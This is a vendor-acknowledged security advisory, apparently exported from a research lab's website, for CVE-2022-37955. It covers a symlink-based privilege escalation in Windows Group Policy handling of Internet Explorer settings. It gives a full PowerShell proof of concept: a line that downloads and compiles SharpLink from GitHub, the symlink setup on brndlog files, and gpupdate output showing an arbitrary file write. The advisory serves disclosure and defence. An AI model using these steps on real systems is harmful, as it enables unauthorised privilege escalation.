{"id":19979,"date":"2023-04-24T10:31:46","date_gmt":"2023-04-24T08:31:46","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=19979"},"modified":"2023-04-24T13:58:20","modified_gmt":"2023-04-24T11:58:20","slug":"usd-2022-0034","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0034\/","title":{"rendered":"usd-2022-0034"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

<\/h1>\n

usd-2022-0034 | Privilege Escalation in Microsoft Windows<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2022-0034
Product<\/strong>: Microsoft Windows
Affected Version<\/strong>: Windows 10 (19044.1826), Windows Server 2019 (17763.3046), probably others...
Vulnerability Type<\/strong>: Improper Link Resolution Before File Access (CWE-59) \u00a0- Privilege Escalation<\/span>
Security Risk<\/strong>: High
Vendor URL<\/strong>: https:\/\/www.microsoft.com<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE-Number: <\/strong>CVE-2022-37955<\/p>\n

 <\/p>\n

Affected Component(s)<\/h3>\n

The vulnerability affects Group Policy Updates<\/em> that contain policy settings for the Internet Explorer<\/em>. Not all
policy settings are affected. One of the affected policy settings is the Internet Explorer User Accelerators<\/em> setting.<\/p>\n

Desciption<\/h3>\n

Windows Group Policy Updates<\/em> may allow low privileged user accounts to elevate their privileges by abusing symbolic file system links.<\/p>\n

Windows Group Policies<\/em> are used to control and define the working environment of users and computers within Active Directory<\/em>.
They provide a great amount of control and allow to centrally manage Windows settings that should be unified within an organization.
Group Policy Settings<\/em> are usually defined on a domain controller and pulled regularly by domain joined computers. After pulling the
configured settings, the computer is responsible for parsing and applying the obtained policies. During this processing, it was identified
that the component responsible for parsing Internet Explorer<\/em> related policy settings performs a copy operation within a user controlled
location of the file system. By using symbloc file system links, it is possible to redirect this copy operation and write user controlled
files to arbitrary locations within the file system. From here, there are many known techniques to achieve a privilege escalation, like
DLL<\/em> hijacking or overwriting service executables.<\/p>\n

Proof of Concept<\/h3>\n

When processing Internet Explorer<\/em> related Group Policy Updates<\/em>, the file C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\Internet Explorer\\\\brndlog.txt<\/strong>
is used for storing log data. Before overwriting the file, it is copied to C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\Internet Explorer\\\\brndlog.bak<\/strong>.
If a corresponding Group Policy Settings<\/em> (like e.g. Internet Explorer User Accelerators<\/em>) is configured, both files should already be present:<\/p>\n

\n
<\/span>C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\Internet Explorer>dir<\/span>\n\n   Directory of C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\Internet Explorer<\/span>\n\n   28\/07\/2022  11:39    <DIR>          .<\/span>\n   28\/07\/2022  11:39    <DIR>          ..<\/span>\n   28\/07\/2022  11:39               713 brndlog.bak<\/span>\n   28\/07\/2022  11:39               713 brndlog.txt<\/span>\n   ...<\/span><\/pre>\n<\/div>\n
Since the folder C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\Internet Explorer<\/strong> is fully user controlled, it is possible to delete all items within it
(It might be the case that a process holds a lock on the directory C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\Internet Explorer\\\\CacheStorage<\/strong>, but this
process is use conrolled and can be stopped). Afterwards, tools like SharpLink<\/a> can be used to create symbolic
links for the files brndlog.txt<\/strong> and brandlog.bak<\/strong>. The file brndlog.txt<\/strong> needs to be linked to the file that should be copied and the file brndlog.bak<\/strong>
should be linked to the target location within the file system.<\/p>\n
\n
<\/span>PS C:\\\\> echo \"Hello World :D\" > C:\\\\Users\\\\user\\\\hello.txt<\/span>\nPS C:\\\\> $c = iwr [https:\/\/raw.githubusercontent.com\/usdAG\/SharpLink\/main\/SharpLink.cs]() -UseBasicParsing<\/span>\nPS C:\\\\> Add-Type $c.Content<\/span>\nPS C:\\\\> $lg = New-Object de.usd.SharpLink.LinkGroup<\/span>\nPS C:\\\\> $lg.AddSymlink(\"C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\Internet Explorer\\\\brndlog.txt\", \"C:\\\\Users\\\\user\\\\hello.txt\")<\/span>\nPS C:\\\\> $lg.AddSymlink(\"C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\Internet Explorer\\\\brndlog.bak\", \"C:\\\\usd.txt\")<\/span>\nPS C:\\\\> $lg.Open()<\/span>\n[!] Junction directory C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\Internet Explorer isn't empty. Delete files? (y\/N) y<\/span>\n[+] Creating Junction: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\Internet Explorer -> \\\\RPC CONTROL<\/span>\n[+] Creating DosDevice: Global\\\\GLOBALROOT\\\\RPC CONTROL\\\\brndlog.txt -> \\\\??\\\\C:\\\\Users\\\\user\\\\hello.txt<\/span>\n[+] Symlink setup successfully.<\/span>\n[+] Junction C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Microsoft\\\\Internet Explorer -> \\\\RPC CONTROL does already exist.<\/span>\n[+] Creating DosDevice: Global\\\\GLOBALROOT\\\\RPC CONTROL\\\\brndlog.bak -> \\\\??\\\\C:\\\\usd.txt<\/span>\n[+] Symlink setup successfully.<\/span><\/pre>\n<\/div>\n
After applying a Group Policy Update<\/em>, the file C:\\\\usd.txt<\/strong> should be created with user controlled content:<\/p>\n
\n
<\/span>PS C:\\\\> gpupdate \/force<\/span>\nUpdating policy...<\/span>\n\nComputer Policy update has completed successfully.<\/span>\nUser Policy update has completed successfully.<\/span>\n\nPS C:\\\\> dir C:\\\\usd.txt<\/span>\n\n    Directory: C:\\\\<\/span>\n\nMode                 LastWriteTime         Length Name<\/span>\n----                 -------------         ------ ----<\/span>\n-a----         7\/28\/2022  12:29 PM             34 usd.txt<\/span>\n\n\nPS C:\\\\> type .\\\\usd.txt<\/span>\nHello World :D<\/span><\/pre>\n<\/div>\n
Fix<\/h3>\n
Whenever high privileged services operate in user controlled parts of the file system they should verify that
file operations get not redirected to unintended locations. When operating on file system regions that are controled
by one particular user, this user should be impersonated during the operation.<\/p>\n
References<\/h3>\n